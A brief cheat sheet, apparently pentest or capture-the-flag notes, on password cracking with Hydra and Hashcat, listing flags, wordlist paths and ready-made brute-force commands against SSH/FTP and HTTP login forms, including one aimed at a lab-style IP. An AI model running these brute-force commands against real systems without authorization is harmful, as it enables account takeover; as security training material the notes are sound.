Cracking Utilities

Hydra is an open source password cracking tool designed to take in a word list and a user/userlist. Hydra is typically used with dictionary attacks

Usage:

hydra -T 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 192.168.0.1 protocol

-T #: Number of parallel connections to targets (threads)

-l user: Username

-L file: Username wordlist

-p password: Password

-P file: Password wordlist

-vV: Verbosity (5 is max)

192.168.0.1: Target IP

protocol: Protocol to use (Ex. ftp, ssh)

Example HTTP login form brute force:

hydra -l milesdyson -P /root/Desktop/log1.txt 10.10.180.153 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect" - php hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password incorrect" - no php

Commonly used wordlists with Hydra:

/usr/share/wordlists/rockyou.txt - Common password wordlist, may be a .gz, you may need to unzip using gunzip

/usr/share/wordlists/fasttrack.txt - Common password wordlist

/usr/share/wordlists/metasploit/unix_users.txt - Username wordlist

/usr/share/wordlists/metasploit/unix_passwords.txt - Password wordlist

Hashcat

Hashcat is a "password recovery tool" similar to john in functionality. Hashcat has a lot of options, I would recommend looking at them either in your terminal man hashcat or online

Usage:

hashcat -m hashtype hash_file wordlist

-m hashtype: Specifies hashing algorithm to crack, list available at manpages.org/hashcat

hash_file: Hash file to crack

  If your hash type is salted, your salt will usually be separated with a :

wordlist: Wordlist to use